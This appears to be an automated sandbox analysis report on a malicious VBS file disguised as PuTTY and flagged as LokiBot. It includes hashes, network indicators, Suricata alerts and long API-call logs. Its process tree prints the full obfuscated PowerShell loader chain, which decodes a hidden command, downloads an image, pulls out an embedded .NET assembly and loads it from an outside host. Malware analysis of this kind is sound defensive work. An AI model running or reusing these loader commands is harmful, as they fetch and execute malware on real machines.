popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Vbs-File0008765putty.vbs

LokiBot Generic Malware Antivirus Socket ScreenShot DNS PWS AntiDebug PowerShell AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 2, 2023, 10:27 a.m. Nov. 2, 2023, 10:30 a.m.
Size 352.8KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 359f4448782994c2b42aa0027ee021db
SHA256 58df85c3ffdb662fe6f84409f2a62124edc7157968e1da10f15464996b23ca99
CRC32 6B59D340
ssdeep 6144:17T97HiRWm7HS/7HSLnCWqkbuEQHSqsYnCmqkbzZ63C6xLD:ixX
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Vbs-File0008765putty.vbs

    1648

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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KGXkhpYIrIKGXHMhpYIrIKGXdhpYIrIKGXBhhpYIrIKGXHIhpYIrIKGXdhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXZQhpYIrIKGXghpYIrIKGXDhpYIrIKGXhpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGEhpYIrIKGXbgBkhpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXdhpYIrIKGXhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGXghpYIrIKGXCshpYIrIKGXPQhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEYhpYIrIKGXbhpYIrIKGXBhhpYIrIKGXGchpYIrIKGXLgBMhpYIrIKGXGUhpYIrIKGXbgBnhpYIrIKGXHQhpYIrIKGXahpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXYgBhhpYIrIKGXHMhpYIrIKGXZQhpYIrIKGX2hpYIrIKGXDQhpYIrIKGXThpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZwB0hpYIrIKGXGghpYIrIKGXIhpYIrIKGXhpYIrIKGX9hpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBzhpYIrIKGXHQh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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

      2136

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LnNrbmlMeXR0dVAvZWxpZi8yMTIuMzExLjU3MS43MDEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

        2272

Name Response Post-Analysis Lookup
imageupload.io
A 104.21.83.102
A 172.67.222.26
104.21.83.102
IP Address Status Action
107.175.113.212 Active Moloch
164.124.101.2 Active Moloch
172.67.222.26 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49166 -> 172.67.222.26:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49166
172.67.222.26:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=imageupload.io b1:21:d8:81:60:0d:67:7c:14:72:94:30:ff:a0:2d:d7:b8:50:dd:46

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: True
console_handle: 0x00000013
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00577e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578520
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578520
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578520
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00577be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00577be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00577be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00577be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00577be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00577be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578520
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578520
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578520
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00578720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005787a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005787a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0064f238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0064f7f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0064f7f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0064f7f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0064ef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0064ef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0064ef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0064ef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0064ef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0064ef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://107.175.113.212/file/PuttyLinks.txt
suspicious_features GET method with no useragent header suspicious_request GET https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg
request GET http://107.175.113.212/file/PuttyLinks.txt
request GET https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 2228224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02800000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
